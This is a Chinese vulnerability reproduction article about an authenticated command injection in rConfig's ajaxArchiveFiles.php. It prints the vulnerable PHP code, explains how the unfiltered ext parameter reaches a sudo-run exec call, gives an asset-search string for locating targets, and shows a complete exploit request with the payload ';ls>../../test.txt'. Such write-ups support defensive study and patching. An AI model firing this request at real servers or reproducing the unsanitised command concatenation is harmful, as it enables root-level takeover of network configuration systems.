问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
rConfig ajaxArchiveFiles.php 后台远程命令执行漏洞
# rConfig ajaxArchiveFiles.php 后台远程命令执行漏洞 ## 漏洞描述 rConfig ajaxArchiveFiles.php文件中由于对path参数和ext参数进行命令拼接,导致攻击者可以远程命令执行获取服务器权...
rConfig ajaxArchiveFiles.php 后台远程命令执行漏洞 ======================================= 漏洞描述 ---- rConfig ajaxArchiveFiles.php文件中由于对path参数和ext参数进行命令拼接,导致攻击者可以远程命令执行获取服务器权限 漏洞影响 ---- rConfig 网络测绘 ---- app="rConfig" 漏洞复现 ---- 存在漏洞的文件 `/home/rconfig/www/lib/ajaxHandlers/ajaxArchiveFiles.php` ```php <?php require_once("/home/rconfig/classes/usersession.class.php"); require_once("/home/rconfig/classes/ADLog.class.php"); require_once("/home/rconfig/config/functions.inc.php"); $log = ADLog::getInstance(); if (!$session->logged_in) { echo 'Don\'t bother trying to hack me!!!!!<br /> This hack attempt has been logged'; $log->Warn("Security Issue: Some tried to access this file directly from IP: " . $_SERVER['REMOTE_ADDR'] . " & Username: " . $session->username . " (File: " . $_SERVER['PHP_SELF'] . ")"); // need to add authentication to this script header("Location: " . $config_basedir . "login.php"); } else { //archive logs files $mainPath = $_GET['path']; $archiveMainPath = $mainPath . "archive/"; $ext = "*." . $_GET['ext']; $fullpath = $mainPath . $ext; // create and archive dir if not already created if (!is_dir($archiveMainPath)) { mkdir("$archiveMainPath"); } $today = date("Ymd"); $commandString = "sudo -u apache zip -r -j " . $archiveMainPath . "filename" . $today . ".zip " . $mainPath . $ext; exec($commandString); foreach (glob($fullpath) as $v) { unlink($v); } $fileCount = count(glob($mainPath . $ext)); if ($fileCount > 0) { $response = json_encode(array( 'failure' => true )); } else { $response = json_encode(array( 'success' => true )); } echo $response; } // end session check ``` 关键代码如下 ```php $mainPath = $_GET['path']; $archiveMainPath = $mainPath . "archive/"; $ext = "*." . $_GET['ext']; $fullpath = $mainPath . $ext; // create and archive dir if not already created if (!is_dir($archiveMainPath)) { mkdir("$archiveMainPath"); } $today = date("Ymd"); $commandString = "sudo -u apache zip -r -j " . $archiveMainPath . "filename" . $today . ".zip " . $mainPath . $ext; exec($commandString); ``` `ext参数` 用户可控 ```php $commandString = "sudo -u apache zip -r -j " . $archiveMainPath . "filename" . $today . ".zip " . $mainPath . $ext; ``` 没有使用过滤直接拼接命令,导致命令执行,并因为sudo而root权限执行,由于是后台漏洞所以需要登录,配合任意用户创建可以RCE 请求包为 ```plain GET /lib/ajaxHandlers/ajaxArchiveFiles.php?path=1&ext=;ls%3E../../test.txt HTTP/1.1 Host: Cookie: cookname=testtest; cookid=a13be657db5e18e453c66c564467b0f2; PHPSESSID=lr7j5r2beat1eprpklrhiorq71 Cache-Control: max-age=0 Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90" Sec-Ch-Ua-Mobile: ?0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Content-Length: 2 ``` 再请求 /test.txt 验证漏洞 ![img](https://shs3.b.qianxin.com/butian_public/f59026162b455fc3473fa334459a366b7cebb76a33697.jpg)
发表于 2024-07-12 18:49:46
阅读 ( 860 )
分类:
网络设备
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!